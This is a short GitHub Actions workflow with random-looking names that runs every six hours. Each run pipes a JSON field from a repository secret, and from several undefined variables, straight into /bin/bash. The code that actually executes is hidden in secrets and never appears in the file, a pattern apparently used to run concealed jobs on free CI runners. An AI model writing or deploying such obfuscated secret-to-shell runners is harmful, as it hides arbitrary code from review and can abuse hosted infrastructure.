name: wujianxiong7651

on:
  workflow_dispatch:
  schedule:
    - cron: '25 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wujianxiong7651
        env:
          vanl3030: ${{ secrets.vanl3030 }}
        run: |
          echo $vanl3030 | jq -r .ryr06 | /bin/bash
          echo $df075 | jq -r .bqbv4467 | /bin/bash
          echo $ycr10749 | jq -r .zzigg63 | /bin/bash
          echo $w6 | jq -r .vyruv657 | /bin/bash
          echo $w138 | jq -r .zgfj28 | /bin/bash

